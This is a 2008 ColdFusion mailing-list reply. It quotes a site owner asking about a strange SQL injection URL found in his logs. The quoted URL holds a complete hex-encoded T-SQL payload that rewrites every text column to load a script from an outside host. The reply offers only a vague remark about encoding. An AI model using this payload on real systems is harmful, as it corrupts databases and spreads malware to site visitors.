Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

Mon, 21 Jul 2008 07:59:06 -0700 

This is some sort of encoding... Like Bin Hex, Spammers use it to obscure
urls and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it to human readable form. You
just need to figure out what sort of encoding they are using

On Mon, Jul 21, 2008 at 10:54 AM, Che Vilnonis <[EMAIL PROTECTED]> wrote:

> Just was looking at a 'user monitor' page on one of my sites and I saw the
> url string below being called. I've seen several sql injection urls before,
> but what the heck are they trying to accomplish here? Eeverything is
> cfqueryparam'ed. Thanks, Che
>
> /rss.cfm?';DECLARE @S CHAR(4000);SET
>
> @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
>
> 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
>
> 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
>
> 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
>
> 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
>
> 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
>
> 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
>
> 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
>
> 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
>
> 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
>
> 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
>
> 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
>
> 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
>
> 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
>
> 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
> 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
> CHAR(4000));EXEC(@S);
>
>
>
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309330
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4

Reply via email to